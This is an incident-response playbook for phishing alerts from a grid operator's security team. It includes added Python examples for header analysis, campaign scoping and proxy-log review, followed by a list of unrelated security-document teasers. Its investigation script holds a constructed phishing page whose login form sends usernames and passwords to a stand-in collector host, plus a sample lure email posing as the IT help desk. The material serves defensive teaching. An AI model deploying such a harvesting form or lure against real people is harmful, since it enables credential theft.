Incident Play Book: Phishing
Issue: 1.0
Issue Date: September 12, 2017
Copyright 2017 Independent Electricity System Operator. Some Rights Reserved.

The following work is licensed under the Creative Commons Attribution 4.0 International License. Under the terms of this license, you are permitted to:
- Share: copy and redistribute the material in any medium or format
- Adapt: remix, transform, and build upon the material for any purpose, even commercially.

The IESO as licensor cannot revoke these freedoms as long as you follow the following license terms:
- Attribution: You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.

To view a copy of this license, visit
Table of Contents
1. Introduction
  1.1 Purpose of the Phishing Playbook
  1.2 Scope
  1.3 Assumptions and Limitations
2. Phishing Playbook
  2.1 Phishing Definition
  2.2 Process Summary
  2.3 Phishing Playbook Procedures
    2.3.1 Identification Stage
    2.3.2 Triage Stage
    2.3.3 Investigation Stage
    2.3.4 Remediation Stage
    2.3.5 Post-Incident Stage

List of Figures
Figure 2-1: Phishing Incident Response Workflow
Figure 2-2: Identification Process
Figure 2-3: Triage Process
Figure 2-4: Investigation Process
Figure 2-5: Remediation Process
Figure 2-6: Post-Incident Process

List of Tables
Table 2-1: Process Stage Descriptions
Table 2-2: Responsibility Index
Table 2-3: Identification Procedures
Table 2-4: Triage Procedures
Table 2-5: Investigation Procedures
Table 2-6: Remediation Procedures
Table 2-7: Post-Incident Procedures
1. Introduction

Playbooks define the procedures for security event investigation and response. Each security monitoring use case will generally have a corresponding playbook, which allows a responder to follow a structured methodology for validating and responding to each unique security alert. The playbook for a specific use case is a living document; updates are encouraged in order to capture current procedures and unique guidance, so that the detected event or incident can be quickly responded to and contained.

1.1 Purpose of the Phishing Playbook

Phishing has become a serious concern for organizations in all industries. Threat actors often use phishing to entice victims into providing valuable information such as credentials, in an effort to gain an initial foothold in the environment. The procedures in this playbook will assist the Security Operations team in responding to phishing-related alerts. The response procedures include validating phishing emails, understanding the impact, and determining the best containment approach for the threat at hand. The remediation process ends with resolving any potential impact and implementing preventative controls to protect systems.

1.2 Scope

The scope of this document includes any phishing-related events or alerts that are either identified during daily security operations or otherwise escalated to the Security Operations team. Security Operations owns this procedure and is responsible for maintenance activities, including reviews and revisions.

1.3 Assumptions and Limitations

This document is to be used as a reference for the following security roles:
- Level 1 (L1) Security Operations Center (SOC): 24x7 security monitoring team that reviews and performs the initial investigation of security alerts.
- Level 2 (L2) Incident Analyst: performs incident investigation and response for frequently occurring or more common security events.
- Level 2 (L2) Incident Specialist: handles confirmed major incidents, or attacks attributed to a targeted attacker.

This document version is limited to the current environment and the currently deployed technology in its current configuration state. Procedures should be regularly updated to include any new and relevant technology. Furthermore, all investigation and analysis activities must be performed in a lab environment with limited internet connectivity, or over a dedicated internet connection that is not attributable to the organization, so that visiting a phishing page or its submission URL does not reveal the investigation to the attacker.

2. Phishing Playbook

2.1 Phishing Definition

Phishing is when an attacker attempts to collect sensitive information such as usernames, passwords, credit card details, Social Security Numbers, Protected Health Information and other personal or protected data, often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication. The term is sometimes confused with emails that contain malware intended to infect the recipient's system; however, the appropriate term for those emails is malspam (malicious spam). Those events should follow the Malicious Code Playbook.

2.2 Process Summary

The workflow below depicts the five stages of the phishing Incident Response (IR) process: Identification, Triage, Investigation, Remediation and Post-Incident.

Table 2-1: Process Stage Descriptions
- Identification: the identification and initial scoping of a security alert.
- Triage: verifying whether the security alert is an incident, determining the severity of the incident, and additional analysis.
- Investigation: investigating the security incident in detail, ensuring all information is documented. The investigator will have fully scoped the incident by the end of this stage.
- Remediation: containment and remediation steps for mitigating and eradicating the threat.
- Post-Incident: a final review of the investigation record by the L2 Incident Specialist, ensuring nothing was overlooked. Once completed, the record is closed.

Figure 2-1 below illustrates a high-level overview of the Phishing IR workflow. This diagram should be used as a quick reference for phishing-related investigations. For detailed procedures for each of the sub-processes, refer to the Phishing Playbook Procedures section.

Figure 2-1: Phishing Incident Response Workflow (diagram not reproduced in this transcription)

Throughout the workflow, a specific level of the security organization, as per the diagram above and the table below, handles each phase of the incident and is responsible for the actions therein.

Table 2-2: Responsibility Index
- Identification: (L1) SOC
- Triage: (L2) Incident Analyst
- Investigation: (L2) Incident Analyst
- Remediation: (L2) Incident Analyst
- Post-Incident: (L2) Incident Specialist
2.3 Phishing Playbook Procedures

2.3.1 Identification Stage

The Identification stage deals with the identification and initial scoping of a security alert.

Figure 2-2: Identification Process (workflow diagram not reproduced in this transcription)

Table 2-3: Identification Procedures (L1 SOC)

Relevant Tools:
- IBM QRadar
- Case Management Utility (CMU)
- Symantec Endpoint Protection (SEP)
- Symantec Email Security, BrightMail
- Websense
- TippingPoint

Procedures:

1. Initial Alert: Phishing Attack
a) For SIEM alerts, the L1 is alerted to potential phishing emails by the SIEM solution.
b) For all other alerts, the L1 is alerted to a potential phishing email from other, non-SIEM sources.

2. Create an Investigation Record
An investigation record is opened for each discrete alert within the CMU, and all pertinent investigative data is recorded there. Duplicate events, or events that are components of the same investigation, can be aggregated into a previously opened case, provided the investigation record is still in the open state.

3. Validate that the original message headers are present
The L1 first inspects the message's original headers. To do so, the L1 must receive the original email as an attachment to a secondary email. If an email is received via the forward feature, the L1 must respond to the initial sender (i.e. the internal recipient of the suspicious email) and request that they attach the original message to a new email as an attachment and send it to the <SOC> email address. An inline forward carries only the forwarding user's headers; the original Received: chain, Return-Path and X-Originating-IP are lost.

4. Message Data Gathering
During the data gathering process, the L1 gathers relevant data regarding the alert, based on the type of alert and the sources of information available. In the case of a phishing email, the following details should be collected:
- Sender address
- Recipient address(es)
- Subject line
- Sending server IP address
- X-Originating-IP (or similar, if available)

5. Record Message Delivery Ratio and Impacted Users
Perform a query on Symantec Email Security for related messages. Search based on unique identifiers that will identify all messages in the phishing campaign. Multiple searches may be necessary, as a simple search by subject or sender may not identify all related messages from the campaign: attackers vary fields such as the subject line throughout a campaign in order to evade detection. Pivoting on fields the attacker is less likely to rotate, such as the sending server IP address or the domain of the embedded URL, helps identify the remaining variants. In the case of a phishing email, the following details should be collected:
- Number of emails in the campaign that successfully bypassed Symantec Email Security and/or BrightMail
- Number of emails in the campaign blocked by Symantec Email Security and/or BrightMail
- User IDs of users that received the phishing email

6. Attachment Collection
If the original message contains a file attachment, collect the file safely and store it within a password-protected zip file, using the password "infected" (so that endpoint protection does not quarantine the evidence and nobody opens it by accident). Attach this file to the investigation record.

7. Domain & URL Profiling
Profile the domain and URL contained within the message (if applicable):
- Record the full URL to the phishing webpage.
- Record VirusTotal.com results by searching the URL.
  o Do not submit the URL to VirusTotal; only perform a URL search. A submission makes VirusTotal fetch the page, which can consume a victim-specific tracking URL or alert the attacker.
- Submit the URL to URLVoid.com and record the Safety Reputation score and report URL.
- Submit the IP address to IPVoid.com and record the Detection Ratio and report URL.
- Look up the WHOIS registration information, save it in a .txt file and attach it to the investigation record.
- Search the URL on PhishTank.com to validate whether it has already been reported as a phish.
- Additionally, search the URL or any related IP addresses using the remaining URL scanning services in the template below (e.g., URLQuery) and record the URL and findings in the investigation record.

Sample Template
Note: Numbers below may vary as services are upgraded.
VirusTotal: <#> / 54 <VirusTotal URL>
URLVoid: <#> / 26 <URLVoid URL>
IPVoid: <#> / 40 <IPVoid URL>
URLQuery: <Alerts> / <IDS> <URLQuery URL>
PhishTank Result: <PhishTank URL>

8. Escalate
The L1 escalates the investigation to the L2 Incident Analyst.
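The following Python script is an added illustration of steps 4, 5 and 7 above; it is not part of the IESO playbook. It pulls the data-gathering fields out of a constructed .eml sample, derives the identifier VirusTotal's v3 API uses for a search-only URL lookup (GET /urls/{id}, as opposed to the POST that submits a URL for scanning), and correlates a constructed mail-gateway log to produce the delivery ratio and impacted user list. The gateway hostname gw1.corp.example and the key=value log layout are assumptions for the example, not the real Symantec Email Security export format. It goes slightly beyond the text by showing, on the same data, why a subject-only search undercounts a campaign whose subject line was rotated.

```python
"""Identification-stage data gathering for a suspected phishing email.

Added example, not part of the IESO playbook. The .eml text and the mail
gateway log are constructed; the key=value log layout and the gateway
hostname are assumptions, not the real Symantec Email Security format.
"""
import base64
import re
from email import message_from_string
from email.utils import getaddresses, parseaddr
from urllib.parse import urlparse

EDGE_GATEWAY = "gw1.corp.example"          # our own edge MTA (assumption)
IPV4 = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")
URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed original message, received as an attachment (step 3) so the
# Received: chain and X-Originating-IP are intact.
RAW_EMAIL = """\
Return-Path: <bounce@mail-relay.example.net>
Received: from mail-relay.example.net (mail-relay.example.net [203.0.113.45])
\tby gw1.corp.example with ESMTP id 7A1B2C
\tfor <jdoe@corp.example>; Tue, 12 Sep 2017 08:14:02 -0400
Received: from [192.0.2.77] by mail-relay.example.net with SMTP
X-Originating-IP: [192.0.2.77]
From: "IT Service Desk" <helpdesk@corp-example-support.com>
To: jdoe@corp.example, asmith@corp.example
Subject: Action required: mailbox quota exceeded
Content-Type: text/plain; charset="utf-8"

Your mailbox is full. Restore access at http://corp-example-support.com/owa/login.php
"""


def sending_server_ip(msg):
    """IP of the external MTA that handed the message to our edge gateway:
    the 'from' part of the Received: header that our gateway stamped."""
    for received in msg.get_all("Received", []):
        if f"by {EDGE_GATEWAY}" in received:
            m = IPV4.search(re.split(r"\s+by\s+", received)[0])
            return m.group(1) if m else None
    return None


def gather(raw):
    """Step 4: the fields the L1 records in the investigation record."""
    msg = message_from_string(raw)
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    xo = IPV4.search(msg.get("X-Originating-IP", ""))
    return {
        "sender": parseaddr(msg.get("From", ""))[1],
        "recipients": [a for _, a in getaddresses(msg.get_all("To", []))],
        "subject": msg.get("Subject", ""),
        "sending_server_ip": sending_server_ip(msg),
        "x_originating_ip": xo.group(1) if xo else None,
        "urls": URL_RE.findall(body),
    }


def virustotal_url_id(url):
    """Step 7 caveat: VirusTotal v3 looks a URL up with GET /urls/{id}, id being
    the unpadded URL-safe base64 of the URL. That only reads existing results;
    POST /urls would submit the URL for scanning, which the playbook forbids."""
    return base64.urlsafe_b64encode(url.encode()).decode().rstrip("=")


# Constructed gateway log, one key=value record per message.
GATEWAY_LOG = """\
ts=08:14:02 src_ip=203.0.113.45 from=helpdesk@corp-example-support.com rcpt=jdoe@corp.example subject="Action required: mailbox quota exceeded" url_domain=corp-example-support.com verdict=delivered
ts=08:14:03 src_ip=203.0.113.45 from=helpdesk@corp-example-support.com rcpt=asmith@corp.example subject="Action required: mailbox quota exceeded" url_domain=corp-example-support.com verdict=delivered
ts=08:21:40 src_ip=203.0.113.45 from=it-desk@corp-example-support.com rcpt=bwong@corp.example subject="Your password expires today" url_domain=corp-example-support.com verdict=delivered
ts=08:22:11 src_ip=203.0.113.45 from=it-desk@corp-example-support.com rcpt=clee@corp.example subject="Your password expires today" url_domain=corp-example-support.com verdict=blocked
ts=09:05:00 src_ip=198.51.100.9 from=news@vendor.example rcpt=jdoe@corp.example subject="Monthly newsletter" url_domain=vendor.example verdict=delivered
"""
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_log(text):
    return [{k: v.strip('"') for k, v in KV.findall(line)}
            for line in text.splitlines() if line.strip()]


def campaign_delivery(rows, pivots):
    """Step 5: select every message matching any pivot value, then report the
    delivery ratio and the user IDs that received a copy."""
    hits = [r for r in rows if any(r.get(k) == v for k, v in pivots.items())]
    delivered = [r for r in hits if r["verdict"] == "delivered"]
    return {
        "bypassed": len(delivered),
        "blocked": sum(1 for r in hits if r["verdict"] == "blocked"),
        "impacted_users": sorted({r["rcpt"].split("@")[0] for r in delivered}),
        "subjects_seen": sorted({r["subject"] for r in hits}),
    }


if __name__ == "__main__":
    rec = gather(RAW_EMAIL)
    rows = parse_log(GATEWAY_LOG)
    lure = urlparse(rec["urls"][0]).hostname
    print("record:", rec)
    print("VirusTotal lookup id (GET, not a submission):", virustotal_url_id(rec["urls"][0]))
    # A subject-only search undercounts: the attacker rotated the subject line.
    print("by subject:", campaign_delivery(rows, {"subject": rec["subject"]}))
    print("by sending IP / lure domain:",
          campaign_delivery(rows, {"src_ip": rec["sending_server_ip"], "url_domain": lure}))
```

On the constructed log the subject pivot finds two delivered copies, while the sending-IP / lure-domain pivot finds three delivered and one blocked, with a third impacted user; that difference is the reason step 5 calls for multiple searches.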
2.3.2 Triage Stage

The Triage stage deals with verifying whether the security alert is an incident, the severity of the incident, and additional analysis.

Figure 2-3: Triage Process (workflow diagram not reproduced in this transcription)

Table 2-4: Triage Procedures (L2 Incident Analyst)

Relevant Tools:
- Case Management Utility (CMU)
- Symantec Email Security, BrightMail
- Dynamic malware analysis sandbox

Procedures:

1. Known False Positive
If this alert is a known false positive that is in the process of being tuned out, close the investigation at this point.

2. Phishing vs. Malicious Email
Based on inspection of the message, does the message constitute a phishing email, or an email containing malware or links to malicious code? If applicable, submit the attachment (previously attached to the investigation record) to the dynamic malware analysis sandbox and attach the resulting report to the investigation record. If the file attachment is malicious or contains malicious code, refer to the Malicious Code Playbook.

3. Spear-Phishing Verification
Does the email appear to be sophisticated and highly targeted at the organization or at specific individuals? Does the phishing campaign show any of the following attributes (not limited to):
- A small number of users received the email
- Not a generic mass-mail type message (e.g., it mentions our organization)
- Impersonation of anyone within our organization
- Embedded links or attachments purporting to be documents related to our organization
If the email is deemed to be highly targeted, refer to the Targeted Attack Playbook.

4. Declare Incident, Determine the Incident Priority, and Open the Incident Ticket
Use the Excel-based Incident Priority Calculator to calculate a priority rating for this case based on the information collected during the first two phases of the investigation. Open an Incident Ticket in HP Service Manager.

5. Escalate
If the Incident Priority rating is P1 or P2, escalate the incident to the L2 Incident Specialist for further investigation.

2.3.3 Investigation Stage

The Investigation stage deals with investigating the security incident in detail, ensuring all information is documented. The investigator will have fully scoped the incident by the end of this stage.

Figure 2-4: Investigation Process (workflow diagram not reproduced in this transcription)

Table 2-5: Investigation Procedures (L2 Incident Analyst)

Relevant Tools:
- Symantec Endpoint Protection (SEP)
- CheckPoint, Cisco ASA firewalls
- Symantec Email Security, BrightMail
- Websense
- TippingPoint
- Mandiant Redline
- EnCase Enterprise
- Wireshark

Procedures:

1. Analyze Email Header
Examine the header for the following phishing attributes:
- The Return-Path field contains an address that is not related to the name shown in the From field of the original email.
- The X-Authenticated-User field contains an address which appears suspicious (e.g., johnsmith@unknowndomain.ru).
- The mail server IP address in the header is known to be malicious.
  o Look the IP address up (e.g., on IPVoid, as in Identification step 7).
- The domain is known to be malicious.
  o Look the domain up (e.g., on URLVoid or VirusTotal, as in Identification step 7).
Header details, including external tool search results, must be recorded in the investigation record.

2. Determine Phishing Page Submission URL
Analyze the phishing page URL and determine where the page posts the submitted data. Do this from the non-attributable lab connection described in section 1.3.

Option 1:
- Load the URL in the ToolsVoid URL Content Dump.
- Copy the contents of the Downloaded RAW Data section into a code beautifier and click Beautify JavaScript or HTML.
- Copy the beautified data into a text editor (e.g., Notepad++) for analysis.
- Search for the FORM object. Typically, a search for <form will identify it quickly. Ensure you are looking at the form that has method="post" and is the main submission form, not a search bar or some other form on the page.
- Read the action parameter and determine the URL where the form is being posted. A relative or empty action posts back to the phishing page's own host.
- Record this URL in the investigation record.

Option 2:
- Open the URL in your browser with view-source: prepended to the URL. The browser retrieves the files but presents the source code to you, without executing the code or rendering the page.
- Copy the contents into a code beautifier and click Beautify JavaScript or HTML.
- Copy the beautified data into a text editor (e.g., Notepad++) for analysis.
- Search for the FORM object as in Option 1, making sure it is the main method="post" submission form.
- Read the action parameter and determine the URL where the form is being posted.
- Record this URL in the investigation record.
Neither Option 1 nor Option 2 executes JavaScript, so a form that is built or rewritten by script will not be visible in the source; use Option 3 in that case.

Option 3:
- Start Wireshark and commence a packet capture (disable Promiscuous Mode).
- Access the phishing URL in a web browser with JavaScript enabled.
- Fill in the phishing page form with false data and submit the form.
- Close the page and stop the packet capture.
- Apply a filter in Wireshark for http.request.uri contains "phishing domain"
  o The quotation marks are important, and the content within them should be the actual domain from the investigation, not the words "phishing domain".
  o This identifies the initial request made by the user when loading the phishing form page.
- Click on the line item, note the packet number, and clear the filter.
- Review the following lines of traffic to understand where the request was submitted.
- Apply a filter in Wireshark for http.request.method == "POST"
  o This identifies the POST request made by the user when submitting the form.
- Alternatively:
  o Click File
  o Click Export Objects (near the bottom)
  o Select HTTP
  o Once the packets have been processed, a dialog box labelled "Wireshark: HTTP object list" appears
  o Review the list for a quick summary view of the HTTP transactions that occurred during the packet capture
  o Identify the traffic that immediately follows the access to the phishing domain
These HTTP display filters match cleartext traffic only. If the form posts over HTTPS, the POST is inside TLS, and only the destination host (from the DNS query or TLS handshake) will be visible in the capture.

3. Review Proxy Logs for Evidence of Access to the Phishing Page URL
Run a Websense report summarized by user with verdict Allowed on the domain hosting the phishing page. Record the list of user IDs in the investigation record.

4. Review Proxy Logs for Evidence of Phishing Click-Through to the Submission Page
Run a Websense report summarized by user with verdict Allowed on the domain hosting the phishing submission page. Record the list of user IDs in the investigation record.

5. Affected User Profiling
Profile the users that have clicked through to the submission page and record this information in the investigation record.
- Record User ID
- Look up and record the user's name, title, department and physical location

6. Escalation Verification: Recalculate Priority Rating
Using the information gathered so far, recalculate the incident priority rating using the Excel-based Incident Priority Calculator. If the priority has been raised to P1 or P2, escalate to the L2 Incident Specialist. Additionally, engage Security Operations Management to initiate the Crisis Response Plan (CRP) as necessary.
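The following Python script is an added example of Investigation steps 1 to 4; it is not code from the IESO playbook. It applies the header checks of step 1 to a constructed message, extracts the action of the main POST form from constructed phishing page HTML (what Options 1 and 2 of step 2 do by hand, including resolving a relative action against the page URL), and then filters constructed proxy log lines for users whose requests to the lure domain and to the submission domain were allowed (steps 3 and 4). The blocklist sets stand in for the reputation services the playbook names, and the proxy log layout is an assumption rather than Websense's real report format.

```python
"""Investigation-stage checks for a phishing email: header red flags, the
form submission URL, and proxy-log review of who reached the page.

Added example, not from the IESO playbook. The message, the phishing page
HTML, the blocklists and the proxy log lines are constructed; the proxy
log layout is an assumption, not Websense's real report format.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

RAW_EMAIL = """\
Return-Path: <x9f2k@bulk-sender.example.org>
X-Authenticated-User: johnsmith@unknowndomain.ru
Received: from bulk-sender.example.org ([203.0.113.45]) by gw1.corp.example with ESMTP
From: "Corp IT" <helpdesk@corp-example-support.com>
To: jdoe@corp.example
Subject: Action required: mailbox quota exceeded

Restore access: http://corp-example-support.com/owa/login.php
"""
# Constructed stand-ins for the reputation lookups the playbook names.
KNOWN_BAD_IPS = {"203.0.113.45"}
KNOWN_BAD_DOMAINS = {"corp-example-support.com"}


def domain_of(addr):
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def header_red_flags(raw):
    """Step 1: the header attributes the analyst is told to examine."""
    msg = message_from_string(raw)
    flags = []
    from_dom = domain_of(msg.get("From", ""))
    rp_dom = domain_of(msg.get("Return-Path", ""))
    if rp_dom and rp_dom != from_dom:
        flags.append(f"Return-Path domain {rp_dom} does not match From domain {from_dom}")
    auth = msg.get("X-Authenticated-User", "")
    if auth and domain_of(auth) != from_dom:
        flags.append(f"X-Authenticated-User {auth} is unrelated to the From domain")
    received = " ".join(msg.get_all("Received", []))
    for ip in re.findall(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", received):
        if ip in KNOWN_BAD_IPS:
            flags.append(f"mail server IP {ip} is known malicious")
    if from_dom in KNOWN_BAD_DOMAINS:
        flags.append(f"sender domain {from_dom} is known malicious")
    return flags


# Constructed phishing page: a decoy GET search form plus the real POST form.
PHISH_HTML = """<html><body>
<form action="/search" method="get"><input name="q"></form>
<form id="login" method="POST" action="https://collector.example.net/post.php">
  <input name="user"><input name="pass" type="password"></form>
</body></html>"""


class FormFinder(HTMLParser):
    """Collect (method, action) for every <form>, as step 2 Options 1/2 do by eye."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            a = dict(attrs)
            self.forms.append(((a.get("method") or "get").lower(), a.get("action") or ""))


def submission_url(page_url, html):
    """Absolute URL the main POST form submits to. An empty or relative
    action posts back to the page itself, hence the urljoin."""
    finder = FormFinder()
    finder.feed(html)
    posts = [action for method, action in finder.forms if method == "post"]
    return urljoin(page_url, posts[0]) if posts else None


# Constructed proxy log lines (layout is an assumption, not Websense's).
PROXY_LOG = """\
2017-09-12T08:20:11 user=jdoe verdict=Allowed method=GET url=http://corp-example-support.com/owa/login.php
2017-09-12T08:20:35 user=jdoe verdict=Allowed method=POST url=https://collector.example.net/post.php
2017-09-12T08:31:02 user=asmith verdict=Allowed method=GET url=http://corp-example-support.com/owa/login.php
2017-09-12T08:40:50 user=bwong verdict=Blocked method=GET url=http://corp-example-support.com/owa/login.php
2017-09-12T09:00:00 user=clee verdict=Allowed method=GET url=https://intranet.corp.example/
"""
LINE = re.compile(r"user=(\S+) verdict=(\S+) method=(\S+) url=(\S+)")


def allowed_users(log, domain):
    """Steps 3 and 4: users whose requests to `domain` the proxy allowed."""
    users = set()
    for m in LINE.finditer(log):
        user, verdict, _method, url = m.groups()
        if verdict == "Allowed" and urlparse(url).hostname == domain:
            users.add(user)
    return sorted(users)


if __name__ == "__main__":
    for flag in header_red_flags(RAW_EMAIL):
        print("header:", flag)
    page = "http://corp-example-support.com/owa/login.php"
    post_to = submission_url(page, PHISH_HTML)
    print("form posts to:", post_to)
    print("visited lure page:", allowed_users(PROXY_LOG, urlparse(page).hostname))
    print("reached submission page:", allowed_users(PROXY_LOG, urlparse(post_to).hostname))
```

The difference between the two user lists is what step 5 profiles: everyone in the first list saw the page, but only users in the second list actually posted data to the collector and need the credential reset in the Remediation stage.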
2.3.4 Remediation Stage

The Remediation stage deals with containment and remediation steps for mitigating and eradicating the incident.

Figure 2-5: Remediation Process (workflow diagram not reproduced in this transcription)

Table 2-6: Remediation Procedures (L2 Incident Analyst)

Relevant Tools:
- Case Management Utility (CMU)
- HP Service Manager
- Symantec Email Security, BrightMail
- Websense
- PhishTank

Procedures:

1. Implement a Symantec Email Security Block
Provide Symantec with a copy of the email for them to create a blocking rule for future messages of this type. If Symantec Email Security is unable to provide an explicit block on these exact messages, implement a custom rule within Symantec Email Security to prevent further messages matching the sample.

2. Update Web Proxy
Submit the URL of the phishing page to Websense for categorization.

3. Submit URL to PhishTank
Submit the URL of the phishing page to PhishTank for categorization.

4. Change Affected Users' Credentials
Affected users should change their passwords for all systems that may have been compromised by the information submitted to the phishing submission page, including any other system where the same password was reused.

5. Monitor System and User Account for Possible Misuse
Monitor the system and user account of each victim of the phishing attack for any misuse of the harvested credentials.

6. Update the Investigation Record
The investigation record will be updated with all actions performed.
2.3.5 Post-Incident Stage

The Post-Incident stage includes a final review of the investigation record by the L2 Incident Specialist, ensuring nothing was overlooked. Once completed, the record is closed.

Figure 2-6: Post-Incident Process (workflow diagram not reproduced in this transcription)

Table 2-7: Post-Incident Procedures (L2 Incident Specialist)

Relevant Tools:
- Case Management Utility (CMU)
- HP Service Manager

Procedures:

1. Review Investigation Record
Review the investigation record in the CMU and verify that all pertinent information, including details about the investigation as well as the steps taken by the investigator, is recorded accurately.

2. Document Failed Controls
Update the investigation record with the controls that failed to prevent or detect this incident.

3. Close the Investigation Record
Resolve the investigation record in the CMU and any incident remediation tickets in HP Service Manager.

4. Create Incident Review Report
For incidents with a P1 or P2 rating, an After Action Report should be created. Refer to the Playbooks Supporting Content document for more details.

5. Improve/Update
Determine whether there are areas for improvement or whether updates are needed:
i. Update documentation (e.g., use cases, playbooks, SOPs)
ii. Create new SIEM alerts/IOCs as needed
iii. Review technical and policy controls: review additional technology changes, countermeasures, additional controls, or policy changes

End of Document
More informationIncident Response. Is Your CSIRT Program Ready for the 21 st Century?
Incident Response Is Your CSIRT Program Ready for the 21 st Century? Speaker Bio Traditional Response Concepts Technical Incidents Requiring Technical Responses Virus/ Malware Network Intrusion Disaster
More informationAdvanced Malware Protection. Dan Gavojdea, Security Sales, Account Manager, Cisco South East Europe
Advanced Malware Protection Dan Gavojdea, Security Sales, Account Manager, Cisco South East Europe How would you do security differently if you knew you were going to be hacked? Security Challenges Changing
More informationSOLUTION BRIEF REMOTE ACCESS: WEBSHELLS SEE EVERYTHING, FEAR NOTHING
REMOTE ACCESS: WEBSHELLS SEE EVERYTHING, FEAR NOTHING RSA Visibility Reconnaissance Weaponization Delivery Exploitation Installation C2 Action WHAT IS A WEBSHELL? A WebShell is a piece of code or a script
More informationCyberArk Privileged Threat Analytics
CyberArk Privileged Threat Analytics Table of Contents The New Security Battleground: Inside Your Network 3 Privileged account security 3 Collect the right data 4 Detect critical threats 5 Alert on critical
More informationFAQ. Usually appear to be sent from official address
FAQ 1. What is Phishing Email? A form of fraud by which an attacker masquerades as a reputable entity in order to obtain your personal information. Usually appear to be sent from official email address
More informationRSA ADVANCED SOC SERVICES
RSA ADVANCED SOC SERVICES Consulting services to improve threat detection and response EXECUTIVE SUMMARY A holistic approach to enhanced cybersecurity operations This service is for organizations needing
More informationKaspersky Security Network
The Kaspersky Security Network (KSN) is a complex distributed infrastructure dedicated to intelligently processing cybersecurity-related data streams from millions of voluntary participants around the
More informationGladiator Incident Alert
Gladiator Incident Alert Allen Eaves Sabastian Fazzino FINANCIAL PERFORMANCE RETAIL DELIVERY IMAGING PAYMENT SOLUTIONS INFORMATION SECURITY & RISK MANAGEMENT ONLINE & MOBILE 1 2016 Jack Henry & Associates,
More informationSophos Central Admin. help
help Contents About Sophos Central...1 Activate Your License... 2 Overview...3 Dashboard... 3 Alerts...4 Logs & Reports... 15 People...31 Devices... 41 Global Settings... 57 Protect Devices... 90 Endpoint
More informationWHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT
WHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT THREE DECADES OF COMPUTER THREATS In 1986, the Brain boot sector virus caused the first widespread realization
More informationQuickSpecs. Aruba IntroSpect User and Entity Behavior Analytics. Overview. Aruba IntroSpect User and Entity Behavior Analytics Product overview
Overview Product overview Aruba s User and Entity Behavior Analytics (UEBA) solution, Aruba IntroSpect, detects attacks by spotting small changes in behavior that are often indicative of attacks that have
More informationNovetta Cyber Analytics
Know your network. Arm your analysts. Introduction Novetta Cyber Analytics is an advanced network traffic analytics solution that empowers analysts with comprehensive, near real time cyber security visibility
More informationUsing Centralized Security Reporting
This chapter contains the following sections: Centralized Email Reporting Overview, on page 1 Setting Up Centralized Email Reporting, on page 2 Working with Email Report Data, on page 4 Understanding the
More informationINCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER
INCIDENT RESPONDER'S FIELD GUIDE INCIDENT RESPONDER'S INCIDENT RESPONSE PLAN FIELD GUIDE LESSONS FROM A FORTUNE 100 INCIDENT RESPONSE LEADER 1 INCIDENT RESPONDER'S FIELD GUIDE TABLE OF CONTENTS 03 Introduction
More informationThe Resilient Incident Response Platform
The Resilient Incident Response Platform Accelerate Your Response with the Industry s Most Advanced, Battle-Tested Platform for Incident Response Orchestration The Resilient Incident Response Platform
More informationMCAFEE INTEGRATED THREAT DEFENSE SOLUTION
IDC Lab Validation Report, Executive Summary MCAFEE INTEGRATED THREAT DEFENSE SOLUTION Essential Capabilities for Analyzing and Protecting Against Advanced Threats By Rob Ayoub, CISSP, IDC Security Products
More informationRobust Defenses for Cross-Site Request Forgery Review
Robust Defenses for Cross-Site Request Forgery Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic
More informationINCIDENTRESPONSE.COM. Automate Response. Did you know? Your playbook overview - Malware Outbreak
Automate Response Congratulations on selecting IncidentResponse.com to retrieve your custom incident response playbook guide. This guide has been created especially for you for use in within your security
More informationNovember 1, 2018, RP Provision of Managed Security Services on an Annual Contract ADDENDUM #2
November 1, 2018, RP029-18 Provision of Managed Security Services on an Annual Contract ADDENDUM #2 Please see the below summation of the technical questions and answers that have been received regarding
More informationProtecting Against Online Fraud. F5 EMEA Webinar August 2014
Protecting Against Online Fraud F5 EMEA Webinar August 2014 Agenda Fraud threat trends and business challenges Web fraud protection Mobile fraud protection Security operations center Example architecture
More informationOffice 365 Buyers Guide: Best Practices for Securing Office 365
Office 365 Buyers Guide: Best Practices for Securing Office 365 Microsoft Office 365 has become the standard productivity platform for the majority of organizations, large and small, around the world.
More informationForeScout Extended Module for Symantec Endpoint Protection
ForeScout Extended Module for Symantec Endpoint Protection Version 1.0.0 Table of Contents About the Symantec Endpoint Protection Integration... 4 Use Cases... 4 Additional Symantec Endpoint Protection
More informationExternal Supplier Control Obligations. Cyber Security
External Supplier Control Obligations Cyber Security Control Title Control Description Why this is important 1. Cyber Security Governance The Supplier must have cyber risk governance processes in place
More informationCIS Controls Measures and Metrics for Version 7
Level One Level Two Level Three Level Four Level Five Level Six 1.1 Utilize an Active Discovery Tool Utilize an active discovery tool to identify devices connected to the organization's network and update
More informationQuestion No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:
Volume: 75 Questions Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output: Which of the following is occurring? A. A ping sweep B. A port scan
More informationSymantec Protection Suite Add-On for Hosted Security
Symantec Protection Suite Add-On for Hosted Email Security Overview Malware and spam pose enormous risk to the health and viability of IT networks. Cyber criminal attacks are focused on stealing money
More informationSIEM Solutions from McAfee
SIEM Solutions from McAfee Monitor. Prioritize. Investigate. Respond. Today s security information and event management (SIEM) solutions need to be able to identify and defend against attacks within an
